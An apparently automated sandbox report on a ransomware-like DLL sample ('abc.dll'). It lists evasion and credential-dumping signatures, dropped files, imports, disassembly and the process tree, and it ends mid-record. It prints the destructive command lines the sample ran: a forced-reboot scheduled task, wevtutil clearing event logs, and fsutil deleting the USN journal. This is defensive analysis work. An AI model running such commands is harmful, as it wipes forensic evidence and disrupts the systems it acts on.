Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E9367 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect | 1_2_011E9367
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011EA073 GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree | 1_2_011EA073
Enables debug privileges
Source: C:\Windows\System32\rundll32.exe | Process token adjusted: Debug
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_011E1973
Program exit points
Source: C:\Windows\System32\rundll32.exe | API call chain: ExitProcess graph end node | graph_1-5851
Source: C:\Windows\System32\rundll32.exe | API call chain: ExitProcess graph end node | graph_1-5775
Source: C:\Windows\System32\rundll32.exe | API call chain: ExitProcess graph end node | graph_1-5906
Queries a list of all running processes
Source: C:\Windows\System32\rundll32.exe | Process information queried: ProcessInformation
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: -3000
Enumerates the file system
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Esl\
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\System32\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) | graph_1-7255
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: C:\Windows\dllhost.dat
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess | graph_5-3844
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\loaddll32.exe TID: 2720 | Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2792 | Thread sleep time: -1000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728 | Thread sleep time: -2700000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1200000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728 | Thread sleep time: -900000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2776 | Thread sleep time: -540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2856 | Thread sleep time: -3540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728 | Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2848 | Thread sleep time: -10000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2776 | Thread sleep time: -180000s >= -60s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\rundll32.exe | File opened: PhysicalDrive0

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F62566 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00F62566

Language, Device and Operating System Detection:

Contains functionality to create pipes for IPC
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E73FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_011E73FD
Contains functionality to query local / system time
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E84DF GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW,wsprintfW,1_2_011E84DF
Contains functionality to query windows version
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_011E7DEB
Queries the cryptographic machine GUID
Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior Graph ID: 309071, Sample: abc.dll, Start date: 12/07/2017, Architecture: WINDOWS, Score: 100

Process tree (node ids as used in the graph):

  • 0 loaddll32.exe (started from main)
    • 1 rundll32.exe, started by 0
      • 3 cmd.exe, started by 1
        • 6 schtasks.exe, started by 3
      • 5 F915.tmp, started by 1
      • 8 cmd.exe, started by 1
        • 10 wevtutil.exe, started by 8
        • 11 wevtutil.exe, started by 8

Signatures attached to graph nodes:

  • 1 rundll32.exe: Clears the journal log; Clears the windows event log; Connects to many different private IPs (likely to spread or exploit); 11 further signatures hidden at this level
  • 3 cmd.exe: Clears the journal log
  • 5 F915.tmp: Contains functionality to dump credential hashes (LSA Dump)
  • 8 cmd.exe: Clears the journal log

Files dropped by 1 rundll32.exe: F915.tmp (PE32), dllhost.dat (PE32)

IPs contacted by 1 rundll32.exe: 192.168.1.1 (unknown), 192.168.1.0 (unknown), 192.168.1.2 port 80 (unknown); 2 further IPs hidden at this level

Yara Overview

No Yara matches

Startup

  • system is w7_1
  • loaddll32.exe (PID: 2716 cmdline: loaddll32.exe 'C:\Users\user\Desktop\abc.dll' MD5: D2792A55032CFE825F07DCD4BEC5F40F)
    • rundll32.exe (PID: 2724 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • cmd.exe (PID: 2768 cmdline: /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • schtasks.exe (PID: 2824 cmdline: schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • F915.tmp (PID: 2800 cmdline: 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420} MD5: 2813D34F6197EB4DF42C886EC7F234A1)
      • cmd.exe (PID: 2868 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wevtutil.exe (PID: 2888 cmdline: wevtutil cl Setup MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2948 cmdline: wevtutil cl System MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2960 cmdline: wevtutil cl Security MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2972 cmdline: wevtutil cl Application MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • fsutil.exe (PID: 2988 cmdline: fsutil usn deletejournal /D C: MD5: B4834F08230A2EB7F498DE4E5B6AB814)
  • cleanup

Created / dropped Files

File Path | Type and Hashes | Malicious
C:
  • Type: data
  • MD5: 50CF2382E783ADAA465FEEDD1DD36D11
  • SHA: A03E1F69DDBD94A6697E5447AD0B3D76381FEDF8
  • SHA-256: 3A954CE94ECA2286E3524407DB360CC9D809D8A861BC3E9EBA00715E044A33B5
  • SHA-512: D9094F9E2C8A44BE1CB966C5121CCD645E1A6A7F7339D28B4CB925A843AED8182937421BA6445C78E1D70793C5A9721E1B56AE0728A248AB17B73D6B77211E32
true
C:\README.TXT
  • Type: data
  • MD5: DEC0F31784A36435A9A8A2F4419E29C4
  • SHA: 131E51447D2CB7BD1D64C5EA6C78752D946E3558
  • SHA-256: C61506A25D135D19DEA2BE38718A800DA9821395EAD5AE356723D2BF089591CB
  • SHA-512: 7CE28F4D01E449AB61F7D6FB38264223EBC2C0FDA91D3E60AC6C3F21D654B67AEAC8B13097850779E77C71EA48EA01579B983C22B88150FB2335D5E9B79D868E
true
C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
  • Type: PE32 executable for MS Windows (console) Intel 80386 32-bit
  • MD5: B8DB74A05685A45BB1257EF3AD87C0AE
  • SHA: 8C23DD9DCC1989BEC7C2D026216DECD1FAE674C5
  • SHA-256: 225E05DC9B98D7A7D63CDE112D6F879FC0C7124FB564746B700DAC839653C2B9
  • SHA-512: D085682BBCCC42160C86FADAA45181A0859C4BAF1900C3C04338571672CAB57A610887B9D29F87CC49B604F8F0544A82C0096E41E58D15733E7FC3BC82A81C5C
true
C:\Users\user\Desktop\abc.dll
  • Type: data
  • MD5: 9A7FFE65E0912F9379BA6E8E0B079FDE
  • SHA: 532BEA84179E2336CAED26E31805CEAA7EEC53DD
  • SHA-256: 4B336C3CC9B6C691FE581077E3DD9EA7DF3BF48F79E35B05CF87E079EC8E0651
  • SHA-512: E8EBF30488B9475529D3345A00C002FE44336718AF8BC99879018982BBC1172FC77F9FEE12C541BAB9665690092709EF5F847B40201782732C717C331BB77C31
false
C:\Windows\dllhost.dat
  • Type: PE32 executable for MS Windows (console) Intel 80386 32-bit
  • MD5: AEEE996FD3484F28E5CD85FE26B6BDCD
  • SHA: CD23B7C9E0EDEF184930BC8E0CA2264F0608BCB3
  • SHA-256: F8DBABDFA03068130C277CE49C60E35C029FF29D9E3C74C362521F3FB02670D5
  • SHA-512: E7C0B64CA5933C301F46DC3B3FD095BCC48011D8741896571BF93AF909F54A6B21096D5F66B4900020DCAECE6AB9B0E1D1C65791B8B5943D2E4D5BAB28340E6F
false
\Device\Harddisk0\DR0
  • Type: partition 2: ID=0x7, starthead 223, startsector 206848, 41734144 sectors, code offset 0x31
  • MD5: 2AAE6A1A720CFD62732FA7D13131D616
  • SHA: 4E43CF175A371E574D5FF21FACF777DB6E520652
  • SHA-256: 2E24E0203DD25DDDD95B1B574915AF282C9CF5AF42B7FFA46E94A855C1A3C386
  • SHA-512: 39A8B58044A950A3EC44F43D4B45C42E62E480F4450AC9E6EE1611A5703BB69908654078936C3E71E6011D759B08EBE64D94AD72323C0E68A7161ED8AC993D67
true
unknown
  • Type: ASCII text, with CRLF line terminators
  • MD5: F7B0D39E5B2B15C4CA6ACDAFE1A3CB9C
  • SHA: BAE8F0CC04A7E7218E1B57D84F784DB9246E6606
  • SHA-256: C3CD57E6E2D2C980B50245BE712785DCB0721A812C317292DAA7E99BA32A7362
  • SHA-512: A078E25F04800918B3E80490C64AEAA3B88E88DDAA6C8F963E6D0DFDC26BF8BE7440F3EB27253A5693DB4604604DB6BA3E42BB47B840CCAA47DE1428E66365A4
true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

IP | Country | ASN | ASN Name | Malicious
192.168.1.1 | unknown | unknown | unknown | false
192.168.1.0 | unknown | unknown | unknown | false
192.168.1.2 | unknown | unknown | unknown | false
192.168.1.16 | unknown | unknown | unknown | false
192.168.1.13 | unknown | unknown | unknown | false

Static File Info

General

File type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:abc.dll
File size:362360
MD5:71b6a493388e7d0b40c83ce903bc6b04
SHA1:34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
SHA256:027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
SHA512:072205eca5099d9269f358fe534b370ff21a4f12d7938d6d2e2713f69310f0698e53b8aff062849f0b2a521f68bee097c1840993825d2a5a3aa8cf4145911c6f
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8/.jV|.jV|.jV|&$.|.jV|...|.jV|...|.jV|...|.jV|...|.jV|.jW|.jV|...|.jV|...|.jV|...|.jV|Rich.jV|................PE..L...\(FY...

Static PE Info

General

Entrypoint:0x10007d39
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x10000000
Subsystem:windows cui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5946285C [Sun Jun 18 07:14:36 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:52dd60b5f3c9e2f17c2e303e8c8d4eab

Authenticode Signature

Signature Valid:false
Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
  • 12/7/2009 11:40:29 PM 3/7/2011 11:40:29 PM
Subject Chain
  • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:3
Thumbprint:9617094A1CFB59AE7C1F7DFDB6739E4E7C40508F
Serial:6101CF3E00000000000F

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+0Ch]
dec eax
jne 0E4F04A1h
mov eax, dword ptr [ebp+08h]
push eax
mov dword ptr [1001F120h], eax
call dword ptr [1000D0E0h]
xor eax, eax
inc eax
pop ebp
retn 000Ch
push ebp
mov ebp, esp
call 0E4F12FBh
mov ecx, dword ptr [ebp+08h]
test ecx, ecx
je 0E4F0494h
mov dword ptr [ecx], eax
xor eax, eax
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 00000618h
push esi
xor esi, esi
cmp dword ptr [1001F0FCh], esi
je 0E4F04F0h
cmp dword ptr [1001F11Ch], esi
je 0E4F04E8h
mov eax, dword ptr [ebp+08h]
lea edx, dword ptr [eax+02h]
mov cx, word ptr [eax]
add eax, 02h
cmp cx, si
jne 0E4F0487h
sub eax, edx
sar eax, 1
push eax
push dword ptr [ebp+08h]
push 100140D0h
call 0E4F1DAEh
test eax, eax
je 0E4F04C1h
push 00000BB8h
call dword ptr [1000D188h]
lea eax, dword ptr [ebp-00000618h]
push eax
call 0E4F09ECh
test eax, eax
je 0E4F04A6h
lea eax, dword ptr [ebp-00000618h]
push eax
call dword ptr [1000D228h]
test eax, eax
je 0E4F0495h
xor esi, esi
inc esi
mov eax, esi
pop esi
leave
retn 0004h
int3
int3
int3
push ebp
mov ebp, esp
mov eax, 00004A18h
call 0E4F2B8Dh

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x15510 | 0x36 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x145f0 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x20000 | 0x3c738 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x57000 | 0x1778 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5d000 | 0x844 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x2c8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xbd63 | 0xbe00 | False | 0.597512335526 | ump; data | 6.54653060932 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x8546 | 0x8600 | False | 0.615875699627 | ump; data | 6.99212929533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x16000 | 0x9b4a | 0x5200 | False | 0.457459984756 | ump; data | 5.42698913823 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x20000 | 0x3c738 | 0x3c800 | False | 0.999495577221 | ump; data | 7.9982879669 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x5d000 | 0xc02 | 0xe00 | False | 0.522321428571 | ump; data | 4.77168126134 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_RCDATA | 0x200e8 | 0x617e | ump; data | English | United States
RT_RCDATA | 0x26268 | 0x6b22 | ump; data | English | United States
RT_RCDATA | 0x2cd8c | 0x2ec75 | ump; data | English | United States
RT_RCDATA | 0x5ba04 | 0xd33 | ump; data | English | United States

Imports

DLL | Import
KERNEL32.dll | ConnectNamedPipe, GetModuleHandleW, CreateNamedPipeW, TerminateThread, DisconnectNamedPipe, FlushFileBuffers, GetTempPathW, GetProcAddress, DeleteFileW, FreeLibrary, GlobalAlloc, LoadLibraryW, GetComputerNameExW, GlobalFree, ExitProcess, GetVersionExW, GetModuleFileNameW, DisableThreadLibraryCalls, ResumeThread, GetEnvironmentVariableW, GetFileSize, SetFilePointer, SetLastError, LoadResource, GetCurrentThread, OpenProcess, GetSystemDirectoryW, SizeofResource, GetLocalTime, Process32FirstW, LockResource, Process32NextW, GetModuleHandleA, lstrcatW, CreateToolhelp32Snapshot, GetCurrentProcess, VirtualFree, VirtualAlloc, LoadLibraryA, VirtualProtect, WideCharToMultiByte, GetExitCodeProcess, WaitForMultipleObjects, CreateProcessW, PeekNamedPipe, GetTempFileNameW, InterlockedExchange, LeaveCriticalSection, MultiByteToWideChar, CreateFileA, GetTickCount, CreateThread, LocalFree, FindNextFileW, CreateFileMappingW, LocalAlloc, FindClose, GetFileSizeEx, CreateFileW, Sleep, FlushViewOfFile, GetLogicalDrives, WaitForSingleObject, GetDriveTypeW, UnmapViewOfFile, MapViewOfFile, FindFirstFileW, CloseHandle, DeviceIoControl, GetLastError, GetSystemDirectoryA, ReadFile, WriteFile, GetProcessHeap, InitializeCriticalSection, HeapReAlloc, GetWindowsDirectoryW, EnterCriticalSection, HeapFree, SetFilePointerEx, HeapAlloc, FindResourceW
USER32.dll | ExitWindowsEx, wsprintfA, wsprintfW
ADVAPI32.dll | CryptGenRandom, CryptAcquireContextA, CryptExportKey, CryptAcquireContextW, CreateProcessAsUserW, InitiateSystemShutdownExW, DuplicateTokenEx, SetTokenInformation, GetTokenInformation, GetSidSubAuthorityCount, OpenThreadToken, GetSidSubAuthority, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetThreadToken, CredEnumerateW, CredFree, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CryptDestroyKey, CryptGenKey, CryptEncrypt, CryptImportKey, CryptSetKeyParam, CryptReleaseContext
SHELL32.dll | CommandLineToArgvW, SHGetFolderPathW
ole32.dll | CoCreateGuid, CoTaskMemFree, StringFromCLSID
CRYPT32.dll | CryptStringToBinaryW, CryptBinaryToStringW, CryptDecodeObjectEx
SHLWAPI.dll | PathAppendW, StrToIntW, PathFindFileNameW, PathFileExistsW, StrCmpW, StrCmpIW, StrChrW, StrCatW, StrStrW, PathFindExtensionW, PathCombineW, StrStrIW
IPHLPAPI.DLL | GetIpNetTable, GetAdaptersInfo
WS2_32.dll | inet_ntoa, gethostbyname, __WSAFDIsSet, ntohl, ioctlsocket, connect, inet_addr, select, recv, send, htons, closesocket, socket, WSAStartup
MPR.dll | WNetOpenEnumW, WNetEnumResourceW, WNetCancelConnection2W, WNetAddConnection2W, WNetCloseEnum
NETAPI32.dll | NetServerEnum, NetApiBufferFree, NetServerGetInfo
DHCPSAPI.DLL | DhcpEnumSubnetClients, DhcpRpcFreeMemory, DhcpGetSubnetInfo, DhcpEnumSubnets
msvcrt.dll | malloc, _itoa, free, memset, rand, memcpy

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 12, 2017 22:07:23.542896986 MESZ | 49235 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:23.542942047 MESZ | 80 | 49235 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:24.085721016 MESZ | 49235 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:24.085777044 MESZ | 80 | 49235 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:24.585623980 MESZ | 49235 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:24.585654020 MESZ | 80 | 49235 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:24.612267017 MESZ | 49240 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:24.612302065 MESZ | 80 | 49240 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:25.179496050 MESZ | 49240 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:25.179527044 MESZ | 80 | 49240 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:25.741707087 MESZ | 49240 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:25.741758108 MESZ | 80 | 49240 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:26.020550966 MESZ | 49259 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:26.020584106 MESZ | 80 | 49259 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:26.538785934 MESZ | 49259 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:26.538822889 MESZ | 80 | 49259 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:27.038621902 MESZ | 49259 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:27.038667917 MESZ | 80 | 49259 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:27.042435884 MESZ | 49269 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:27.042479992 MESZ | 80 | 49269 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:27.538759947 MESZ | 49269 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:27.538794994 MESZ | 80 | 49269 | 192.168.1.2 | 192.168.1.16
Jul 12, 2017 22:07:28.053831100 MESZ | 49269 | 80 | 192.168.1.16 | 192.168.1.2
Jul 12, 2017 22:07:28.053863049 MESZ | 80 | 49269 | 192.168.1.2 | 192.168.1.16

System Behavior

General

Start time:22:08:08
Start date:12/07/2017
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):false
Commandline:loaddll32.exe 'C:\Users\user\Desktop\abc.dll'
Imagebase:0x2b0000
File size:112640 bytes
MD5 hash:D2792A55032CFE825F07DCD4BEC5F40F
Programmed in:C, C++ or other language

General

Start time:22:08:08
Start date:12/07/2017
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Imagebase:0xf0000
File size:44544 bytes
MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
Programmed in:C, C++ or other language

General

Start time:22:08:08
Start date:12/07/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:/c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Imagebase:0x49e20000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:22:08:09
Start date:12/07/2017
Path:C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Wow64 process (32bit):false
Commandline:'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Imagebase:0xf60000
File size:47616 bytes
MD5 hash:2813D34F6197EB4DF42C886EC7F234A1
Programmed in:C, C++ or other language

General

Start time:22:08:09
Start date:12/07/2017
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Imagebase:0x76e20000
File size:179712 bytes
MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:C, C++ or other language

General

Start time:22:08:11
Start date:12/07/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Imagebase:0x49f60000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:22:08:12
Start date:12/07/2017
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil cl Setup
Imagebase:0xda0000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language

General

Start time:22:08:13
Start date:12/07/2017
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil cl System
Imagebase:0xb10000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language

General

Start time:22:08:13
Start date:12/07/2017
